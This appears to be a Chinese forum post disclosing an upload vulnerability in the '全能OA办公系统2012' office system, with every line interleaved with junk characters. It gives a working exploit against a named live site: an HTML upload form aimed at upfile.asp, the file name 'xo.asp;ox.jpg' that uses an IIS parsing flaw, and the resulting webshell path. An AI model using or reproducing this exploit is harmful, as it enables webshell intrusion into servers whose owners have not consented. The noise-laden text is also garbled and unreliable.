全能OA办公系统 上传漏洞
$ J& D: x5 s. i! b9 @8 ?. Z* g; }/ W2 m) z2 N2 v
系统介绍:
; K; G9 y6 j, `" W, n" t: A3 L8 Y% ?6 `6 M2 o/ \
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
7 P c1 {1 ~0 y* \: ]+ }/ j1 g% G# g3 O$ K6 Q; c' A. c
主要功能:6 y5 O6 J# Z2 k' x
公司通告
7 S, ?' P$ u C# k' h W: q工作计划 ) r/ N! y, u* s' ~
通讯助理
% T4 O' @ s, N$ @客户资源 2 G7 ~8 `4 L% |* v7 F9 }
我的公文
q: C: \5 X) Q, f, j5 j1 ~5 i公文传阅 6 U- H! V& I, Y7 M
公共资源 ! d9 y' k V5 n, c: K, e4 }
资源预约
6 M6 T* Q5 V5 f, ]5 v& X1 k今日考勤
! @2 z) n% ?9 ~0 p$ ^个人计划
4 E$ T* M7 _. I个人通讯录 % T6 m% g: @+ [$ K# E7 g2 d
个人基本档案 * X' r. |0 l9 U& |5 h" R5 u
未读邮件 O9 p( G+ o4 @
发邮件 - J w, e! a; L! d
收件夹 . ^! T J/ v3 C/ R( z
寄件夹 % V9 M1 S! F% Q
网络硬盘
5 [( G' j, K0 m网络会议
$ W+ i- u. [; }, b# g# W, C网络调查
3 f" \' U& a. e0 b+ t1 c交流论坛
- ^- V- x5 K% r6 o7 W" r
' V+ ~! F8 G+ \9 Q ]/ ~% H1 p有兴趣测试的朋友可以下源码看看
8 S# W9 O2 p, j# `; O( h3 m$ X5 R, _! L- s* X5 q8 x5 V
源码下载:' I. [& j0 l: g- s/ T, ]
; n% |! g3 x. s) V- o% }
http://www.mycodes.net/30/4750.htm! f2 B5 V( j, _9 k
0 B) s7 b( W8 t2 f# N漏洞介绍:
3 E9 [' Q$ u5 W- Z3 }- o: @$ v9 \' S9 k, b
由upfile.asp上传文件漏洞引起
* b2 S! }1 S% n0 w5 [0 s7 U( L( y- J, v4 o: t4 b. r
测试方法:" w# y2 A/ T0 m; O' z8 |& T3 m
5 `& v. C- @4 X6 q% e* W o. G使用名小子上传http://www.itlynn.com/upfile.asp即可
4 \# J) I& ^8 _. S# p( E: P
; T8 ~3 f2 s/ Y. U" M如果upfile.asp文件被删除不存在。) ]$ t( l1 a7 l3 \
( P/ S' h1 r, t0 [# ?
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
8 [1 a( U# Y/ Y- l% k! u! H2 V: @: o! U# d. ~
如果存在那么将如下代码保存为upfile.html。
6 `# H/ ^9 B5 w4 h# {3 @4 R9 ~
* p; v7 o! U1 `# o* e然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
5 X# N& `& G) }: k1 G9 y
# |( z6 Z# |0 v3 ~
, Q; S1 I1 ~- w* x& f% Z
3 M$ _% ?; [6 M& l! p$ W6 x01 <table border='0' align="center" cellpadding="5">
E1 a0 m! _2 t- g1 Y& d3 @
4 N. ~* d5 J* i02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. j, v: h' W$ @8 K- I- u5 Z
- O- _3 k: S+ ^; C03 <tr> ; j. Q4 G& H) w. Y* h
^' S# V/ C/ s* \
04 <td>报错:</td> 4 Z u$ |# d! k% ~4 n
3 { b( ^* p# V" j6 d
05 <td><input type='radio' name='errnumber' value='0'> 9 O3 g9 M1 n0 h3 L x6 T! O# ~% l0 ~
3 d+ W6 P" v* Q, B/ M# u5 t+ D3 {06 自动更名
7 G) g0 T+ U8 S, x" F+ Z$ P, \7 |* V) |0 `9 [$ o% h7 B
07 <input type='radio' name='errnumber' value='1' checked>
" k& N: _' g8 a. W* V, ?0 y1 E z% r
08 报错方式
; e8 ]( e; u; x2 |
E. e0 Z/ V* ~09 <input type='radio' name='errnumber' value='2'>
$ ~6 R b7 `4 ^
3 m# s/ u2 t* k. R) w& o q10 直接覆盖</td>
# l" i9 W$ K1 O1 B3 T
# H+ d N9 z1 P5 i11 </tr> 8 F) S. b% ?1 I5 Q" q
% \4 D) S6 B' w$ D% l) A+ C" q' u
12 <tr>
# |& B) G. W0 K4 [% U, K# I% Z6 }7 r( b3 I
13 <td>主题:</td>
3 j4 @$ [* R, L7 I3 V) U& L4 r/ N$ ^! _
6 U. B" Y+ G% [6 b14 <td><input type='text' name='filename' size='30'></td> 8 [8 N% Y; g% S, m' `7 ]
9 z: q$ m y2 W" |1 m1 Z7 G15 </tr>
0 }: U) ^5 D, X& t$ {$ B3 T @7 _! g* M* }3 h
16 <tr>
6 r" H5 n( i) G1 Z# {( R& u2 i" H3 q4 u& \ @
17 <td>文件:</td>
6 r' L' n/ t1 ^8 E5 c9 n: J5 U) Z8 u
18 <td><input type="file"name="fruit"size="30"></td> * q/ S$ V) |3 c! @$ a3 l% q
D" g q, a# C" k0 d, \4 J+ A19 </tr>
3 y9 _7 O) Q0 g& j5 ~# X6 {# F% J# k5 o3 `: n
20 <tr>
% @0 Q; U# b/ e! l& w$ q% k) g% s6 s
21 <td valign='top'>简介:</td>
- ?& s5 F2 K* e6 M+ T* D8 T
4 V M* c @3 J j0 C: u9 |: j22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
" C1 V* B; w9 _0 Q6 L2 @6 `# K h6 t4 m: ?
23 </tr>
7 }9 C& S' a" m+ z1 |# I. m
8 h$ z, ?) u% c+ L5 S) e24 ( a) Y I/ ^5 q! h2 u! r8 {6 `
( y9 `& O/ C! \) m
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> & t6 u V' a, h5 D9 g0 b# m: i
3 \) i$ e0 u3 u- X: \26 </tr>
. ^: h8 N! A) T. l) k3 w. i
% k* B# v3 v/ E6 ~$ ~; Q! n27 </form> : C* m3 t0 j9 l7 |+ d' \
1 G# W9 a" k: C! Q- e3 f4 e然后打开上传一个文件名为xo.asp;ox.jpg的文件。
* E1 |5 L0 I. p8 ~0 o0 _
' k( V* M1 L F* L! C
, l" [( y \* p! p# U, t
& ]' W: i/ r' U+ U上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg2 e/ C4 g j8 @6 V. J& W7 M1 H& C
^2 ?9 p: f+ Y
此漏洞需要配合解析漏洞利用。
, u% |: v% u. V0 N- L. @ a" M& P1 b7 s K; Z2 G
|